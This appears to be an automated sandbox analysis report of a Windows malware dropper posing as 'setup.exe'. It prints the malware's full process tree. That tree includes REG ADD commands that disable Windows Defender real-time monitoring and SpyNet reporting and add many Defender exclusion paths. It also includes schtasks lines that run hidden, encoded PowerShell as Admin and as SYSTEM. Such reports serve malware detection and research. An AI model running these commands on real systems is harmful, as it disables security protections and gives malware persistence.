3" EMVGmrK.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDecisionReason = "1" EMVGmrK.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\f6-cc-c8-c8-ae-98 EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1688 schtasks.exe 2344 schtasks.exe 2892 schtasks.exe 2312 schtasks.exe 2496 schtasks.exe 1584 schtasks.exe 1760 schtasks.exe 1152 schtasks.exe 1080 schtasks.exe 2800 schtasks.exe 2712 schtasks.exe 1004 schtasks.exe 804 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 2996 powershell.EXE 2996 powershell.EXE 2996 powershell.EXE 1468 powershell.EXE 1468 powershell.EXE 1468 powershell.EXE 1780 powershell.EXE 1780 powershell.EXE 1780 powershell.EXE 2464 powershell.EXE 2464 powershell.EXE 2464 powershell.EXE 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe 1608 EMVGmrK.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2996 powershell.EXE Token: SeDebugPrivilege 1468 powershell.EXE Token: SeDebugPrivilege 1780 powershell.EXE Token: SeDebugPrivilege 2464 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2748 wrote to memory of 2964 2748 setup.exe 30 PID 2748 wrote to memory of 2964 2748 setup.exe 30 PID 2748 wrote to memory of 2964 2748 setup.exe 30 PID 2748 wrote to memory of 2964 2748 setup.exe 30 PID 2748 wrote to memory of 2964 2748 setup.exe 30 PID 2748 wrote to memory of 2964 2748 setup.exe 30 PID 2748 wrote to memory of 2964 2748 setup.exe 30 PID 2964 wrote to memory of 2180 2964 Install.exe 31 PID 2964 wrote to memory of 2180 2964 Install.exe 31 PID 2964 wrote to memory of 2180 2964 Install.exe 31 PID 2964 wrote to memory of 2180 2964 Install.exe 31 PID 2964 wrote to memory of 2180 2964 Install.exe 31 PID 2964 wrote to memory of 2180 2964 Install.exe 31 PID 2964 wrote to memory of 2180 2964 Install.exe 31 PID 2180 wrote to memory of 2876 2180 Install.exe 33 PID 2180 wrote to memory of 2876 2180 Install.exe 33 PID 2180 wrote to memory of 2876 2180 Install.exe 33 PID 2180 wrote to memory of 2876 2180 Install.exe 33 PID 2180 wrote to memory of 2876 2180 Install.exe 33 PID 2180 wrote to memory of 2876 2180 Install.exe 33 PID 2180 wrote to memory of 2876 2180 Install.exe 33 PID 2180 wrote to memory of 3012 2180 Install.exe 35 PID 2180 wrote to memory of 3012 2180 Install.exe 35 PID 2180 wrote to memory of 3012 2180 Install.exe 35 PID 2180 wrote to memory of 3012 2180 Install.exe 35 PID 2180 wrote to memory of 3012 2180 Install.exe 35 PID 2180 wrote to memory of 3012 2180 Install.exe 35 PID 2180 wrote to memory of 3012 2180 Install.exe 35 PID 2876 wrote to memory of 2684 2876 forfiles.exe 37 PID 2876 wrote to memory of 2684 2876 forfiles.exe 37 PID 2876 wrote to memory of 2684 2876 forfiles.exe 37 PID 2876 wrote to memory of 2684 2876 forfiles.exe 37 PID 2876 wrote to memory of 2684 2876 forfiles.exe 37 PID 2876 wrote to memory of 2684 2876 forfiles.exe 37 PID 2876 wrote to memory of 2684 2876 forfiles.exe 37 PID 3012 wrote to memory of 2420 3012 forfiles.exe 38 PID 3012 wrote to memory of 2420 3012 forfiles.exe 38 PID 3012 wrote to memory of 2420 3012 forfiles.exe 38 PID 3012 wrote to memory of 2420 3012 forfiles.exe 38 PID 3012 wrote to memory of 2420 3012 forfiles.exe 38 PID 3012 wrote to memory of 2420 3012 forfiles.exe 38 PID 3012 wrote to memory of 2420 3012 forfiles.exe 38 PID 2684 wrote to memory of 2840 2684 cmd.exe 39 PID 2684 wrote to memory of 2840 2684 cmd.exe 39 PID 2684 wrote to memory of 2840 2684 cmd.exe 39 PID 2684 wrote to memory of 2840 2684 cmd.exe 39 PID 2684 wrote to memory of 2840 2684 cmd.exe 39 PID 2684 wrote to memory of 2840 2684 cmd.exe 39 PID 2684 wrote to memory of 2840 2684 cmd.exe 39 PID 2420 wrote to memory of 2832 2420 cmd.exe 40 PID 2420 wrote to memory of 2832 2420 cmd.exe 40 PID 2420 wrote to memory of 2832 2420 cmd.exe 40 PID 2420 wrote to memory of 2832 2420 cmd.exe 40 PID 2420 wrote to memory of 2832 2420 cmd.exe 40 PID 2420 wrote to memory of 2832 2420 cmd.exe 40 PID 2420 wrote to memory of 2832 2420 cmd.exe 40 PID 2684 wrote to memory of 2716 2684 cmd.exe 41 PID 2684 wrote to memory of 2716 2684 cmd.exe 41 PID 2684 wrote to memory of 2716 2684 cmd.exe 41 PID 2684 wrote to memory of 2716 2684 cmd.exe 41 PID 2684 wrote to memory of 2716 2684 cmd.exe 41 PID 2684 wrote to memory of 2716 2684 cmd.exe 41 PID 2684 wrote to memory of 2716 2684 cmd.exe 41 PID 2420 wrote to memory of 2956 2420 cmd.exe 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2684 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2840
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
- System Location Discovery: System Language Discovery
PID:2716
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2420 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
- System Location Discovery: System Language Discovery
PID:2832
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
- System Location Discovery: System Language Discovery
PID:2956
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkKMmQgXg" /SC once /ST 00:03:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Scheduled Task/Job: Scheduled Task
PID:2712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkKMmQgXg"4⤵PID:840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkKMmQgXg"4⤵
- System Location Discovery: System Language Discovery
PID:2236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe\" sw /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2312
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8FE753B0-39C2-4C39-A5ED-536B633FE5D4} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]1⤵PID:2284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2492
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2516
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:3000
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2836
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3056
-
C:\Windows\system32\taskeng.exetaskeng.exe {9103196B-3CC5-4FC9-AF42-89FFB994145D} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1888
-
C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exeC:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe sw /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:824 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzPWurHjf" /SC once /ST 00:52:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzPWurHjf"3⤵
- System Location Discovery: System Language Discovery
PID:1508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzPWurHjf"3⤵
- System Location Discovery: System Language Discovery
PID:3020
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:300
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2108 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2232
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXCerFuzY" /SC once /ST 01:06:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXCerFuzY"3⤵PID:2540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXCerFuzY"3⤵
- System Location Discovery: System Language Discovery
PID:1864
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2276 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:643⤵PID:1788
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1856 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:643⤵PID:2988
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:644⤵PID:3048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\rKQlJSGa\XdkHnHrtbgVLNEcI.wsf"3⤵
- System Location Discovery: System Language Discovery
PID:2764
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\rKQlJSGa\XdkHnHrtbgVLNEcI.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2092 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:3040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:324⤵PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:644⤵PID:2088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:1868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:1472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:324⤵PID:1124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:324⤵PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:644⤵PID:2324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:324⤵PID:1196
-
-
